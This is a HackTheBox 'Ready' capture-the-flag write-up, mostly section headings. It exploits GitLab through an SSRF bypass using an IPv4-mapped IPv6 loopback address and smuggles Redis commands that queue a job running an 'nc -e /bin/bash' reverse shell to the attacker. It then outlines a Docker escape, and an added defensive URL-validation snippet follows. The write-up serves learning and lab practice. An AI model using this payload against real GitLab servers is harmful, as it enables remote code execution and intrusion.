Ready — HackTheBox

Source

Passwords, hashes and flags will be redacted to encourage you to solve those challenges on your own.

Synopsis

Skills Required

Skills Learned

Enumeration

nmap
register
gitlab version

Vulnerability Details

commits

Initial Access

create project
setup SSRF Bypass

http://[0:0:0:0:0:ffff:127.0.0.1]:1234/test/ssrf.git

Note: start a netcat listener on any port.

input payload

git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test
multi

sadd resque:gitlab:queues system_hook_push

lpush resque:gitlab:queue:system_hook_push “{\”class\”:\”GitlabShellWorker\”,\”args\”:[\”class_eval\”,\”open(\’|nc -e /bin/bash 10.10.14.24 4444\’).read\”],\”retry\”:3,\”queue\”:\”system_hook_push\”,\”jid\”:\”ad52abc5641173e217eb2e52\”,\”created_at\”:1513714403.8122594,\”enqueued_at\”:1513714403.8129568}”

exec

exec

exec

reverse connection
exploit
reverse connection
user flag
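
A defender's view of the two import URLs above, as an added example that is not part of the original write-up and not GitLab's own code: a URL check that rejects embedded line breaks and unwraps the IPv4-mapped IPv6 literal before testing for loopback. The names `check_import_url` and `ALLOWED_SCHEMES` are hypothetical, and the allowed scheme list is an assumption.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https", "git"}  # assumption: schemes an importer accepts


def check_import_url(url):
    """Return (ok, reason) for a repository import URL."""
    # Reject whitespace and control characters before parsing: a line break
    # inside the URL lets extra protocol lines ride along to the backend.
    if any(ch.isspace() or ord(ch) < 0x20 or ord(ch) == 0x7F for ch in url):
        return False, "control or whitespace character in URL"
    try:
        parts = urlsplit(url)
        host = parts.hostname
        parts.port  # raises ValueError on a malformed port
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if not host:
        return False, "missing host"
    if host == "localhost" or host.endswith(".localhost"):
        return False, "loopback hostname"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name: the caller resolves it and applies the same address
        # checks below to every resolved address before connecting.
        return True, "hostname"
    # Unwrap IPv4-mapped IPv6 (::ffff:a.b.c.d) so 127.0.0.1 cannot hide in it.
    mapped = getattr(addr, "ipv4_mapped", None)
    if mapped is not None:
        addr = mapped
    if addr.is_loopback or addr.is_private or addr.is_link_local or addr.is_unspecified:
        return False, "internal address " + str(addr)
    return True, "ok"
```

The check runs on the raw string first because URL parsers may silently strip line breaks, which would hide the injected lines from any later inspection.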

Privilege Escalation

linpeas
Configuration files
docker composer
linpeas
Container root
host filesystem
mount filesystem
host filesystem
root flag

Thank you for reading this blog. While attempting this challenge I learned so many things. This was a unique target with a unique vulnerability.

Reference

https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
https://gitlab.com/gitlab-org/gitlab-foss/-/commit/ecbdef090277848d409ed7f97f69f53bbac7a92c
https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/
https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout#privileged-flag
